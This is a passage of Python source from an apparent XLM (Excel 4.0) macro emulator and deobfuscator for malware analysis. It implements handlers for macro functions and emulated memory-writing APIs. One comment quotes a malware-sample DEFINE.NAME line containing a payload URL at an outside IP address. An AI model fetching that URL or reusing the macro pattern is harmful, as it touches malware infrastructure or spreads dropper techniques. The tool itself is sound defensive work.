source, destination = (arguments[0], arguments[1]) if destination_arg == 1 else (arguments[1], arguments[0])
src_eval_result = self.evaluate_parse_tree(current_cell, source, interactive)
if isinstance(destination, Token):
# TODO: get_defined_name must return a list; currently it returns list or one item
destination = self.xlm_wrapper.get_defined_name(destination)
if isinstance(destination, list):
destination = [] if not destination else destination[0]
#if (not hasattr(destination, "data")):
# return EvalResult(current_cell, EvalStatus.Error, 0, "")
if destination.data == 'defined_name' or destination.data=='name':
defined_name_formula = self.xlm_wrapper.get_defined_name(destination.children[2])
if isinstance(defined_name_formula, Tree):
destination = defined_name_formula
else:
destination = self.xlm_parser.parse('='+defined_name_formula).children[0]
if destination.data == 'range':
dst_start_sheet, dst_start_col, dst_start_row = self.get_cell_addr(current_cell, destination.children[0])
dst_end_sheet, dst_end_col, dst_end_row = self.get_cell_addr(current_cell, destination.children[2])
else:
dst_start_sheet, dst_start_col, dst_start_row = self.get_cell_addr(current_cell, destination)
dst_end_sheet, dst_end_col, dst_end_row = dst_start_sheet, dst_start_col, dst_start_row
destination_str = XLMInterpreter.convert_ptree_to_str(destination)
text = src_eval_result.get_text(unwrap=True)
if src_eval_result.status == EvalStatus.FullEvaluation:
for row in range(int(dst_start_row), int(dst_end_row) + 1):
for col in range(Cell.convert_to_column_index(dst_start_col),
Cell.convert_to_column_index(dst_end_col) + 1):
if (
dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)) in self.cell_with_unsuccessfull_set:
self.cell_with_unsuccessfull_set.remove((dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)))
self.set_cell(dst_start_sheet,
Cell.convert_to_column_name(col),
str(row),
str(src_eval_result.value))
else:
for row in range(int(dst_start_row), int(dst_end_row) + 1):
for col in range(Cell.convert_to_column_index(dst_start_col),
Cell.convert_to_column_index(dst_end_col) + 1):
self.cell_with_unsuccessfull_set.add((dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)))
if destination_arg == 1:
text = "{}({},{})".format(name,
src_eval_result.get_text(),
destination_str)
else:
text = "{}({},{})".format(name,
destination_str,
src_eval_result.get_text())
return_val = 0
return EvalResult(None, src_eval_result.status, return_val, text)
def evaluate_argument_list(self, current_cell, name, arguments):
current_cell.emulated = True
args_str = ''
for argument in arguments:
if type(argument) is Token or type(argument) is Tree:
arg_eval_Result = self.evaluate_parse_tree(current_cell, argument, False)
args_str += arg_eval_Result.get_text() + ','
args_str = args_str.strip(',')
return_val = text = '{}({})'.format(name, args_str)
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def evaluate_function(self, current_cell, parse_tree_root, interactive):
current_cell.emulated = True
function_name = parse_tree_root.children[0]
if debug:
print("FUNCTION NAME!!")
print(function_name)
# OFFSET()()
if isinstance(function_name, Tree) and function_name.data == 'function_call':
if debug:
print("HERE: 1")
func_eval_result = self.evaluate_parse_tree(current_cell, function_name, False)
if func_eval_result.status != EvalStatus.FullEvaluation:
return EvalResult(func_eval_result.next_cell, func_eval_result.status, 0, XLMInterpreter.convert_ptree_to_str(parse_tree_root))
else:
func_eval_result.text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return func_eval_result
# handle alias name for a function (REGISTER)
# c45ed3a0ce5df27ac29e0fab99dc4d462f61a0d0c025e9161ced3b2c913d57d8
if function_name in self._registered_functions:
if debug:
print("HERE: 2")
parse_tree_root.children[0] = parse_tree_root.children[0].update(None,
self._registered_functions[function_name][
'name'])
return self.evaluate_function(current_cell, parse_tree_root, interactive)
# cell_function_call
if isinstance(function_name, Tree) and function_name.data == 'cell':
if debug:
print("HERE: 3")
self._function_call_stack.append(current_cell)
return self.goto_handler([function_name], current_cell, interactive, parse_tree_root)
if function_name.lower() in self.defined_names:
if debug:
print("HERE: 4")
try:
ref_parsed = self.xlm_parser.parse('='+ self.defined_names[function_name.lower()])
if isinstance(ref_parsed.children[0],Tree) and ref_parsed.children[0].data =='cell':
function_name = ref_parsed.children[0]
else:
raise Exception
except:
function_name = self.defined_names[function_name.lower()]
# cell_function_call
if isinstance(function_name, Tree) and function_name.data == 'cell':
if debug:
print("HERE: 5")
self._function_call_stack.append(current_cell)
return self.goto_handler([function_name], current_cell, interactive, parse_tree_root)
if self.ignore_processing and function_name != 'NEXT':
if debug:
print("HERE: 6")
if function_name == 'WHILE':
self.next_count += 1
return EvalResult(None, EvalStatus.IGNORED, 0, '')
arguments = []
for i in parse_tree_root.children[2].children:
if debug:
print("HERE: 7")
if type(i) is not Token:
if len(i.children) > 0:
arguments.append(i.children[0])
else:
arguments.append(i.children)
if function_name in self._handlers:
if debug:
print("HERE: 8")
eval_result = self._handlers[function_name](arguments, current_cell, interactive, parse_tree_root)
else:
if debug:
print("HERE: 9")
eval_result = self.evaluate_argument_list(current_cell, function_name, arguments)
if function_name in XLMInterpreter.jump_functions:
eval_result.output_level = 0
elif function_name in XLMInterpreter.important_functions:
eval_result.output_level = 2
else:
eval_result.output_level = 1
return eval_result
# region Handlers
def and_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = True
status = EvalStatus.FullEvaluation
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if EvalResult.unwrap_str_literal(str(arg_eval_result.value)).lower() != "true":
value = False
break
else:
status = EvalStatus.PartialEvaluation
value = False
break
return EvalResult(None, status, value, str(value))
def or_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = False
status = EvalStatus.FullEvaluation
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if EvalResult.unwrap_str_literal(str(arg_eval_result.value)).lower() == "true":
value = True
break
else:
status = EvalStatus.PartialEvaluation
break
return EvalResult(None, status, value, str(value))
def active_cell_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if self.active_cell:
if self.active_cell.formula:
parse_tree = self.xlm_parser.parse(self.active_cell.formula)
eval_res = self.evaluate_parse_tree(current_cell, parse_tree, interactive)
val = eval_res.value
status = eval_res.status
else:
val = self.active_cell.value
status = EvalStatus.FullEvaluation
return_val = val
text = str(return_val)
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = text
return EvalResult(None, status, return_val, text)
def get_cell_handler(self, arguments, current_cell, interactive, parse_tree_root):
if len(arguments) == 2:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
dst_sheet, dst_col, dst_row = self.get_cell_addr(current_cell, arguments[1])
type_id = arg1_eval_result.value
if self.is_float(type_id):
type_id = int(float(type_id))
if dst_sheet is None:
dst_sheet = current_cell.sheet.name
status = EvalStatus.PartialEvaluation
if arg1_eval_result.status == EvalStatus.FullEvaluation:
data, not_exist, not_implemented = self.xlm_wrapper.get_cell_info(dst_sheet, dst_col, dst_row, type_id)
if not_exist and 1 == 2:
return_val = self.get_default_cell_info(type_id)
text = str(return_val)
status = EvalStatus.FullEvaluation
elif not_implemented:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = ''
else:
text = str(data) if data is not None else None
return_val = data
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = ''
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def set_name_handler(self, arguments, current_cell, interactive, parse_tree_root):
label = EvalResult.unwrap_str_literal(XLMInterpreter.convert_ptree_to_str(arguments[0])).lower()
if isinstance(arguments[1], Tree) and arguments[1].data == 'cell':
arg2_text = XLMInterpreter.convert_ptree_to_str(arguments[1])
names = self.xlm_wrapper.get_defined_names()
names[label] = arguments[1]
text = 'SET.NAME({},{})'.format(label, arg2_text)
return_val = 0
status = EvalStatus.FullEvaluation
else:
arg2_eval_result = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if arg2_eval_result.status is EvalStatus.FullEvaluation:
arg2_text = arg2_eval_result.get_text(unwrap=True)
names = self.xlm_wrapper.get_defined_names()
names[label] = arg2_text
text = 'SET.NAME({},{})'.format(label, arg2_text)
return_val = 0
status = EvalStatus.FullEvaluation
else:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = arg2_eval_result.status
return EvalResult(None, status, return_val, text)
def end_if_handler(self, arguments, current_cell, interactive, parse_tree_root):
self._indent_level -= 1
self._indent_current_line = True
status = EvalStatus.FullEvaluation
return EvalResult(None, status, 'END.IF', 'END.IF')
def get_workspace_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 1:
arg1_eval_Result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg1_eval_Result.status == EvalStatus.FullEvaluation and self.is_float(arg1_eval_Result.get_text()):
workspace_param = self.get_workspace(int(float(arg1_eval_Result.get_text())))
current_cell.value = workspace_param
text = 'GET.WORKSPACE({})'.format(arg1_eval_Result.get_text())
return_val = workspace_param
status = EvalStatus.FullEvaluation
next_cell = None
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def get_window_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 1:
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation and self.is_float(arg_eval_result.get_text()):
window_param = self.get_window(int(float(arg_eval_result.get_text())))
current_cell.value = window_param
text = window_param # XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = window_param
status = EvalStatus.FullEvaluation
else:
return_val = text = 'GET.WINDOW({})'.format(arg_eval_result.get_text())
status = arg_eval_result.status
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def on_time_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 2:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[1])
sheets = self.xlm_wrapper.get_macrosheets()
if next_sheet in sheets:
next_cell = self.get_formula_cell(sheets[next_sheet], next_col, next_row)
text = 'ON.TIME({},{})'.format(arg1_eval_result.get_text(), str(next_cell))
status = EvalStatus.FullEvaluation
return_val = 0
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
next_cell = None
return EvalResult(next_cell, status, return_val, text)
def concatenate_handler(self, arguments, current_cell, interactive, parse_tree_root):
text = ''
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
text += arg_eval_result.get_text(unwrap=True)
return_val = text
text = EvalResult.wrap_str_literal(text)
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def day_handler(self, arguments, current_cell, interactive, parse_tree_root):
if self.day_of_month is None:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg1_eval_result.status == EvalStatus.FullEvaluation:
if type(arg1_eval_result.value) is datetime.datetime:
#
# text = str(arg1_eval_result.value.day)
# return_val = text
# status = EvalStatus.FullEvaluation
return_val, status, text = self.guess_day()
elif self.is_float(arg1_eval_result.value):
text = 'DAY(Serial Date)'
status = EvalStatus.NotImplemented
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = arg1_eval_result.status
else:
text = str(self.day_of_month)
return_val = text
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def guess_day(self):
xlm = self
min = 1
best_day = 0
for day in range(1, 32):
xlm.char_error_count = 0
non_printable_ascii = 0
total_count = 0
xlm = copy.copy(xlm)
xlm.day_of_month = day
try:
for index, step in enumerate(xlm.deobfuscate_macro(False, silent_mode=True)):
for char in step[2]:
if not (32 <= ord(char) <= 128):
non_printable_ascii += 1
total_count += len(step[2])
if index > 10 and ((non_printable_ascii + xlm.char_error_count) / total_count) > min:
break
if total_count != 0 and ((non_printable_ascii + xlm.char_error_count) / total_count) < min:
min = ((non_printable_ascii + xlm.char_error_count) / total_count)
best_day = day
if min == 0:
break
except Exception as exp:
pass
self.day_of_month = best_day
text = str(self.day_of_month)
return_val = text
status = EvalStatus.FullEvaluation
return return_val, status, text
def now_handler(self, arguments, current_cell, interactive, parse_tree_root):
return_val = text = datetime.datetime.now()
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def if_handler(self, arguments, current_cell, interactive, parse_tree_root):
visited = False
for stack_frame in self._branch_stack:
if stack_frame[0].get_local_address() == current_cell.get_local_address():
visited = True
if visited is False:
self._indent_level += 1
size = len(arguments)
if debug:
print("IF HANDLER!!")
print(arguments)
if size == 3:
cond_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if self.is_bool(cond_eval_result.value):
cond_eval_result.value = bool(strtobool(cond_eval_result.value))
elif self.is_int(cond_eval_result.value):
if int(cond_eval_result.value) == 0:
cond_eval_result.value = True
else:
cond_eval_result.value = False
if cond_eval_result.status == EvalStatus.FullEvaluation:
if cond_eval_result.value:
if type(arguments[1]) is Tree or type(arguments[1]) is Token:
self._branch_stack.append(
(current_cell, arguments[1], current_cell.sheet.cells, self._indent_level, '[TRUE]'))
status = EvalStatus.Branching
else:
status = EvalStatus.FullEvaluation
else:
if type(arguments[2]) is Tree or type(arguments[2]) is Token:
self._branch_stack.append(
(current_cell, arguments[2], current_cell.sheet.cells, self._indent_level, '[FALSE]'))
status = EvalStatus.Branching
else:
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
else:
memory_state = copy.deepcopy(current_cell.sheet.cells)
if type(arguments[2]) is Tree or type(arguments[2]) is Token or type(arguments[2]) is list:
self._branch_stack.append(
(current_cell, arguments[2], memory_state, self._indent_level, '[FALSE]'))
if type(arguments[1]) is Tree or type(arguments[1]) is Token or type(arguments[1]) is list:
self._branch_stack.append(
(current_cell, arguments[1], current_cell.sheet.cells, self._indent_level, '[TRUE]'))
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.FullBranching
else:
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
else:
# loop detected
text = '[[LOOP]]: ' + XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.End
return EvalResult(None, status, 0, text)
def mid_handler(self, arguments, current_cell, interactive, parse_tree_root):
str_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
base_eval_result = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
len_eval_result = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if str_eval_result.status == EvalStatus.FullEvaluation:
if base_eval_result.status == EvalStatus.FullEvaluation and \
len_eval_result.status == EvalStatus.FullEvaluation:
if self.is_float(base_eval_result.value) and self.is_float(len_eval_result.value):
base = int(float(base_eval_result.value)) - 1
length = int(float(len_eval_result.value))
return_val = EvalResult.unwrap_str_literal(str_eval_result.value)[base: base + length]
text = str(return_val)
status = EvalStatus.FullEvaluation
if status == EvalStatus.PartialEvaluation:
text = 'MID({},{},{})'.format(XLMInterpreter.convert_ptree_to_str(arguments[0]),
XLMInterpreter.convert_ptree_to_str(arguments[1]),
XLMInterpreter.convert_ptree_to_str(arguments[2]))
return EvalResult(None, status, return_val, text)
def define_name_handler(self, arguments, current_cell, interactive, parse_tree_root):
# DEFINE.NAME(name_text, refers_to, macro_type, shortcut_text, hidden, category, local)
# Evaluate the arguments to DEFINE.NAME()
if debug:
print("DEFINE.NAME HANDLER!!")
arg_eval_results = self.evaluate_argument_list(current_cell, "DEFINE.NAME", arguments)
if debug:
print("ARGS!!")
print(arg_eval_results)
# Set the defined name to the resolved value.
# DEFINE.NAME("HxoCNvuiUvSesa","http://195.123.242.72/IQ2Ytf5113.php",3,"J",TRUE,"Tc",FALSE)
name_pat = r'DEFINE\.NAME\("([^"]*)","([^"]*)"'
name_info = re.findall(name_pat, arg_eval_results.text)
if debug:
print(name_info)
if (len(name_info) > 0):
name, val = name_info[0]
if debug:
print("SET '" + name + "' = '" + val + "'")
self.xlm_wrapper.get_defined_names()[name] = val
# NOT CORRECT.
return arg_eval_results
def goto_handler(self, arguments, current_cell, interactive, parse_tree_root):
if debug:
print("GOTO HANDLER!!")
print(current_cell)
print(parse_tree_root)
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[0])
next_cell = None
if next_sheet is not None and next_sheet in self.xlm_wrapper.get_macrosheets():
next_cell = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[next_sheet],
next_col,
next_row)
status = EvalStatus.FullEvaluation
else:
status = EvalStatus.Error
# Emulate the cell we are jumping to.
if (next_cell is not None):
# Parse the contents of the cell we jumped to.
if debug:
print("NEXT CELL!!")
print(next_cell.debug())
if (next_cell.formula is not None):
parse_tree = self.xlm_parser.parse(next_cell.formula)
func_eval_result = self.evaluate_parse_tree(next_cell, parse_tree, False)
if debug:
print("GOTO EVAL OF " + str(next_cell))
print(func_eval_result)
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(next_cell, status, return_val, text)
def halt_handler(self, arguments, current_cell, interactive, parse_tree_root):
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
#status = EvalStatus.End
status = EvalStatus.FullEvaluation
self._indent_level -= 1
return EvalResult(None, status, return_val, text)
def call_handler(self, arguments, current_cell, interactive, parse_tree_root):
if debug:
print("CALL HANDLER!!")
print(current_cell.debug())
argument_texts = []
status = EvalStatus.FullEvaluation
for argument in arguments:
if debug:
print("START ARG EVAL!!" + str(argument))
arg_eval_result = self.evaluate_parse_tree(current_cell, argument, interactive)
if debug:
print("DONE ARG EVAL!!" + str(argument))
print(arg_eval_result)
if arg_eval_result.status != EvalStatus.FullEvaluation:
status = arg_eval_result.status
argument_texts.append(arg_eval_result.get_text())
list_separator = self.xlm_wrapper.get_xl_international_char(XlApplicationInternational.xlListSeparator)
text = 'CALL({})'.format(list_separator.join(argument_texts))
return_val = 0
return EvalResult(None, status, return_val, text)
def is_number_handler(self, arguments, current_cell, interactive, parse_tree_root):
eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if eval_result.status == EvalStatus.FullEvaluation:
if type(eval_result.value) is float or type(eval_result.value) is int:
return_val = True
else:
return_val = False
text = str(return_val)
else:
return_val = text = 'ISNUMBER({})'.format(eval_result.get_text())
return EvalResult(None, eval_result.status, return_val, text)
def search_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if arg1_eval_res.status == EvalStatus.FullEvaluation and arg2_eval_res.status == EvalStatus.FullEvaluation:
try:
arg1_val = arg1_eval_res.get_text(unwrap=True)
arg2_val = arg2_eval_res.get_text(unwrap=True)
return_val = arg2_val.lower().index(arg1_val.lower())
text = str(return_val)
except ValueError:
return_val = None
text = ''
status = EvalStatus.FullEvaluation
else:
text = 'SEARCH({},{})'.format(arg1_eval_res.get_text(), arg2_eval_res.get_text())
return_val = 0
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def round_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if arg1_eval_res.status == EvalStatus.FullEvaluation and arg2_eval_res.status == EvalStatus.FullEvaluation:
return_val = round(float(arg1_eval_res.value), int(float(arg2_eval_res.value)))
text = str(return_val)
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def directory_handler(self, arguments, current_cell, interactive, parse_tree_root):
text = r'C:\Users\user\Documents'
return_val = text
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def char_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if 0 <= float(arg_eval_result.text) <= 255:
return_val = text = chr(int(float(arg_eval_result.text)))
cell = self.get_formula_cell(current_cell.sheet, current_cell.column, current_cell.row)
cell.value = text
status = EvalStatus.FullEvaluation
else:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
self.char_error_count += 1
status = EvalStatus.Error
else:
text = 'CHAR({})'.format(arg_eval_result.text)
return_val = text
status = EvalStatus.PartialEvaluation
return EvalResult(arg_eval_result.next_cell, status, return_val, text)
def run_handler(self, arguments, current_cell, interactive, parse_tree_root):
size = len(arguments)
if 1 <= size <= 2:
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[0])
if next_sheet is not None and next_sheet in self.xlm_wrapper.get_macrosheets():
next_cell = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[next_sheet],
next_col,
next_row)
if size == 1:
text = 'RUN({}!{}{})'.format(next_sheet, next_col, next_row)
else:
text = 'RUN({}!{}{}, {})'.format(next_sheet, next_col, next_row,
XLMInterpreter.convert_ptree_to_str(arguments[1]))
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.Error
return_val = 0
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.Error
return EvalResult(next_cell, status, return_val, text)
def formula_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'FORMULA', arguments, interactive)
def formula_fill_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'FORMULA.FILL', arguments, interactive)
def set_value_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'SET.VALUE', arguments, interactive, destination_arg=2)
def error_handler(self, arguments, current_cell, interactive, parse_tree_root):
return EvalResult(None, EvalStatus.FullEvaluation, 0, XLMInterpreter.convert_ptree_to_str(parse_tree_root))
def select_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
range_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if len(arguments) == 2:
# e.g., SELECT(B1:B100,B1) and SELECT(,"R[1]C")
if self.active_cell:
sheet, col, row = self.get_cell_addr(self.active_cell, arguments[1])
else:
sheet, col, row = self.get_cell_addr(current_cell, arguments[1])
if sheet:
self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
elif isinstance(arguments[0], Token):
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
elif arguments[0].data == 'range':
# e.g., SELECT(D1:D10:D1)
sheet, col, row = self.selected_range[2]
if sheet:
self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
elif arguments[0].data == 'cell':
# select(R1C1)
if self.active_cell:
sheet, col, row = self.get_cell_addr(self.active_cell, arguments[0])
else:
sheet, col, row = self.get_cell_addr(current_cell, arguments[0])
if sheet:
self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
def while_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
text = ''
stack_record = {'start_point': current_cell, 'status': False}
condition_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
status = condition_eval_result.status
if condition_eval_result.status == EvalStatus.FullEvaluation:
if str(condition_eval_result.value).lower() == 'true':
stack_record['status'] = True
text = '{} -> [{}]'.format(XLMInterpreter.convert_ptree_to_str(parse_tree_root),
str(condition_eval_result.value))
if not text:
text = '{}'.format(XLMInterpreter.convert_ptree_to_str(parse_tree_root))
self._while_stack.append(stack_record)
current_cell.visit()
if current_cell.visited_too_many_times():
stack_record['status'] = False
if stack_record['status'] == False:
self.ignore_processing = True
self.next_count = 0
self._indent_level += 1
return EvalResult(None, status, 0, text)
def next_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.FullEvaluation
next_cell = None
if self.next_count == 0:
self.ignore_processing = False
next_cell = None
if len(self._while_stack) > 0:
top_record = self._while_stack.pop()
if top_record['status'] is True:
next_cell = top_record['start_point']
self._indent_level = self._indent_level - 1 if self._indent_level > 0 else 0
self._indent_current_line = True
else:
self.next_count -= 1
if next_cell is None:
status = EvalStatus.IGNORED
return EvalResult(next_cell, status, 0, 'NEXT')
def len_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
return_val = len(arg_eval_result.get_text(unwrap=True))
text = str(return_val)
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = text
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def register_handler(self, arguments, current_cell, interactive, parse_tree_root):
if len(arguments) >= 4:
arg_list = []
status = EvalStatus.FullEvaluation
for index, arg in enumerate(arguments):
if index > 3:
break
res_eval = self.evaluate_parse_tree(current_cell, arg, interactive)
arg_list.append(res_eval.get_text(unwrap=True))
function_name = "{}.{}".format(arg_list[0], arg_list[1])
# signature: https://support.office.com/en-us/article/using-the-call-and-register-functions-06fa83c1-2869-4a89-b665-7e63d188307f
function_signature = arg_list[2]
function_alias = arg_list[3]
# overrides previously registered function
self._registered_functions[function_alias] = {'name': function_name, 'signature': function_signature}
text = self.evaluate_argument_list(current_cell, 'REGISTER', arguments).get_text(unwrap=True)
else:
status = EvalStatus.Error
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
def return_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if self._function_call_stack:
return_cell = self._function_call_stack.pop()
return_cell.value = arg1_eval_res.value
arg1_eval_res.next_cell = self.get_formula_cell(return_cell.sheet,
return_cell.column,
str(int(return_cell.row) + 1))
if arg1_eval_res.text =='':
arg1_eval_res.text = 'RETURN()'
return arg1_eval_res
def fopen_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if len(arguments)> 1:
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
access = arg2_eval_res.value
else:
access = '1'
self._files[arg1_eval_res.get_text(unwrap=True)] = {'file_access': access,
'file_content': ''}
text = 'FOPEN({},{})'.format(arg1_eval_res.get_text(unwrap=False),
access)
return EvalResult(None, arg1_eval_res.status, arg1_eval_res.value, text)
def fwrite_handler(self, arguments, current_cell, interactive, parse_tree_root, end_line=''):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
file_name = arg1_eval_res.get_text(unwrap=True)
file_content = arg2_eval_res.get_text(unwrap=True)
status = EvalStatus.PartialEvaluation
if file_name in self._files:
status = EvalStatus.FullEvaluation
self._files[file_name]['file_content'] += file_content +end_line
text = 'FWRITE({},{})'.format(EvalResult.wrap_str_literal(file_name), EvalResult.wrap_str_literal( file_content))
return EvalResult(None, status, '0', text)
def fwriteln_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.fwrite_handler(arguments, current_cell, interactive, parse_tree_root, end_line='\r\n')
def offset_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = 0
next = None
status = EvalStatus.PartialEvaluation
cell = self.get_cell_addr(current_cell, arguments[0])
row_index = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
col_index = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if isinstance(cell, tuple) and \
row_index.status == EvalStatus.FullEvaluation and \
col_index.status == EvalStatus.FullEvaluation:
row = str(int(cell[2]) + int(float(str(row_index.value))))
col = Cell.convert_to_column_name(Cell.convert_to_column_index(cell[1]) + int(float(str(col_index.value))))
ref_cell = (cell[0], col, row)
value = ref_cell
status = EvalStatus.FullEvaluation
next = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[cell[0]], col, row)
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(next, status, value, text)
def VirtualAlloc_handler(self, arguments, current_cell, interactive, parse_tree_root):
base_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
size_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if base_eval_res.status == EvalStatus.FullEvaluation and size_eval_res.status == EvalStatus.FullEvaluation:
base = int(base_eval_res.get_text(unwrap=True))
occupied_addresses = [rec['base'] + rec['size'] for rec in self._memory]
for memory_record in self._memory:
if memory_record['base'] <= base <= (memory_record['base'] + memory_record['size']):
base = map(max, occupied_addresses) + 4096
size = int(size_eval_res.get_text(unwrap=True))
self._memory.append({
'base': base,
'size': size,
'data': [0] * size
})
return_val = base
status = EvalStatus.FullEvaluation
else:
status = EvalStatus.PartialEvaluation
return_val = 0
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def WriteProcessMemory_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if len(arguments) > 4:
status = EvalStatus.FullEvaluation
args_eval_result = []
for arg in arguments:
arg_eval_res = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_res.status != EvalStatus.FullEvaluation:
status = arg_eval_res.status
args_eval_result.append(arg_eval_res)
if status == EvalStatus.FullEvaluation:
base_address = int(args_eval_result[1].value)
mem_data = args_eval_result[2].value
mem_data = bytearray([ord(x) for x in mem_data])
size = int(args_eval_result[3].value)
if not self.write_memory(base_address, mem_data, size):
status = EvalStatus.Error
